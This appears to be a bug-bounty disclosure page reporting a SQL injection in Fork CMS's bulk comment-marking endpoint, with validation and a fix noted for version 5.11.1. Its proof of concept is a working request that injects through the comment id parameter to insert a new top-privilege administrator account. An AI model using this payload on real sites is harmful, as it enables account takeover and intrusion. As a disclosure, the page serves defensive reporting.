SQL injection through marking blog comments on bulk as spam in forkcms/forkcms

Valid

Reported on

Mar 23rd 2022

Description

the comments ids aren't checked and vulnerable for SQL injection

Proof of Concept

https://127.0.0.1:8001/private/en/blog/mass_comment_action?token=q58o77xs9&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=spam

Impact

This vulnerability is capable of injection sql

We are processing your report and will contact the forkcms team within 24 hours. a year ago

Jelmer Prins modified the report

a year ago

Jelmer Prins

commented a year ago

Maintainer

@admin found this one while writing fixes for other reported issues but it seems like I can't approve nor confirm it

Jamie Slome validated this vulnerability a year ago

Jelmer Prins has been awarded the disclosure bounty

The fix bounty is now up for grabs

Jamie Slome marked this as fixed in 5.11.1 with commit 6aca30 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation